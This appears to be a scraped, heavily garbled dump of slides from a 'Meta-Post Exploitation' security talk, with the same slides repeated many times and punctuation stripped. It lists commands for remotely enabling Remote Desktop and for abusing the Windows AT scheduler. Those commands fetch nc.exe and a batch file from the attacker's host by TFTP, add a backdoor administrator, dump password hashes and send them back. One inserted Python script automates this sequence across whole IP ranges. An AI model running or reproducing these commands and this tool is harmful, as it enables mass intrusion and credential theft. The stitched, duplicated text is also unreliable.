bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
• Privileges of LocalSystem that we care about
– NT AUTHORITY\SYSTEM and BUILTIN\Administrators SIDs
– SE_IMPERSONATE_NAME
– SE_TCB_NAME
– SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
• Automating techniques and tools for use against massive numbers of hosts
• Goals
– Penetrate as many systems as possible with little interaction and in a short time
– Ease of use / re-use
– Lower cost of attack
Slide 65
Massive Automation
• MassNetUse – Establish NetBIOS session credentials on a range of hosts
• MassWinenum – Enumerate NetBIOS information, bypass certain RestrictAnonymous settings
• AtAbuse – Use the scheduler as your "shell" to control ranges of hosts
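The following Python is an added example, not code from the slides or from the authors' MassNetUse/AtAbuse tools. It sketches the flow of slides 60–61 (session, `net time`, two `at` jobs) and the range handling of slide 65: the `at` time is computed from the target's own `net time` reply rather than the attacker's clock, because `at` treats a time that is already past on the target as tomorrow. Assumed names: `e.bat` is the batch file the slides mention, the addresses 10.0.0.9 and 192.168.1.x and the canned `net time` output are constructed, and the hash-dump line in the batch file is a placeholder because the slides do not name a tool.

```python
import ipaddress
import re
import subprocess
from datetime import datetime, timedelta

# English-locale reply of `net time \\host`, e.g.
#   Current time at \\WS01 is 6/12/2008 12:34 PM
# The AM/PM group is optional so a 24-hour locale still parses.
NET_TIME_RE = re.compile(
    r"is\s+(\d{1,2}/\d{1,2}/\d{4})\s+(\d{1,2}:\d{2}(?::\d{2})?)\s*([AaPp][Mm])?"
)


def parse_net_time(output: str) -> datetime:
    """Extract the target's clock from `net time` output (minute resolution is all `at` needs)."""
    m = NET_TIME_RE.search(output)
    if not m:
        raise ValueError(f"unrecognised net time output: {output!r}")
    date_s, clock, ampm = m.group(1), m.group(2), m.group(3)
    hhmm = ":".join(clock.split(":")[:2])  # drop seconds if the locale prints them
    if ampm:
        return datetime.strptime(f"{date_s} {hhmm} {ampm.upper()}", "%m/%d/%Y %I:%M %p")
    return datetime.strptime(f"{date_s} {hhmm}", "%m/%d/%Y %H:%M")


def at_time(target_now: datetime, minutes_ahead: int) -> str:
    """24-hour HH:MM for `at`, computed from the TARGET's clock. If we used our own clock
    and the target ran a few minutes behind, `at` would see a past time and run tomorrow."""
    when = target_now.replace(second=0, microsecond=0) + timedelta(minutes=minutes_ahead)
    return when.strftime("%H:%M")


def expand_hosts(spec: str) -> list:
    """'10.0.0.0/28' -> usable hosts; a single IP or a hostname -> itself."""
    try:
        net = ipaddress.ip_network(spec, strict=False)
    except ValueError:
        return [spec]  # hostname, not an address
    if net.num_addresses == 1:
        return [str(net.network_address)]
    return [str(h) for h in net.hosts()]


def build_plan(host, user, password, attacker_ip, target_now, batch="e.bat"):
    """Slide-61 sequence for one host: session, fetch the batch file, run it one minute later.
    `at` jobs run as SYSTEM from %SystemRoot%\\System32, which is also where tftp drops e.bat."""
    unc = f"\\\\{host}"
    return [
        f"net use {unc}\\ipc$ {password} /user:{user}",
        f'at {unc} {at_time(target_now, 1)} "tftp -i {attacker_ip} GET {batch}"',
        f"at {unc} {at_time(target_now, 2)} {batch}",
    ]


def batch_contents(attacker_ip: str) -> str:
    """What e.bat does per slide 61. The dumper line is a placeholder (assumption: the
    tool writes %COMPUTERNAME%_hashes.txt); the PUT ships it back tagged with the host."""
    return "\r\n".join([
        "@echo off",
        "net user hacked hacked /add",
        "net localgroup administrators hacked /add",
        "REM <run hash-dump tool here, writing %COMPUTERNAME%_hashes.txt>",
        f"tftp -i {attacker_ip} PUT %COMPUTERNAME%_hashes.txt",
        "",
    ])


def live_net_time(host: str) -> str:
    """Ask a target for its clock; assumes `net use` already authenticated to it."""
    return subprocess.run(["net", "time", f"\\\\{host}"],
                          capture_output=True, text=True, check=True).stdout


def plan_range(spec, user, password, attacker_ip, net_time_for=live_net_time) -> dict:
    """Per-host command lists for a whole range. `net_time_for` is injectable so the
    planner can be exercised offline with canned output."""
    return {
        host: build_plan(host, user, password, attacker_ip,
                         parse_net_time(net_time_for(host)))
        for host in expand_hosts(spec)
    }


if __name__ == "__main__":
    # Dry run on constructed data: two hosts whose clocks differ from ours.
    canned = {
        "192.168.1.1": "Current time at \\\\192.168.1.1 is 6/12/2008 12:34 PM\r\n",
        "192.168.1.2": "Current time at \\\\192.168.1.2 is 6/12/2008 11:58 PM\r\n",
    }
    for host, cmds in plan_range("192.168.1.0/30", "admin", "Passw0rd",
                                 "10.0.0.9", canned.__getitem__).items():
        print(host)
        for c in cmds:
            print("   ", c)
```

Run as-is for a dry run over the constructed hosts; swapping `canned.__getitem__` for the default `live_net_time` makes it query real targets. Note the second host: 11:58 PM plus two minutes becomes 00:00, which `at` correctly schedules for the next day on that host's clock.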
Slide 66
• DEMOS
Slide 67
• Related talks you should see
– Beyond EIP – The theoretical tool development end of things (spoonm & skape)
– Security Implications of Windows Access Tokens (Luke Jennings)
Slide 68
• Acknowledgements
– Thanks to:
• All the people from the offensivecomputing, nologin and uninformed IRC and SILC channels
• HD Moore, especially for support and mentorship
• Danny Quist, krbklepto, Egypt, spoonm, skape
• Luke Jennings for his awesome work
Slide 69
• Questions?
• Presentation available at www.offensivecomputing.net
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
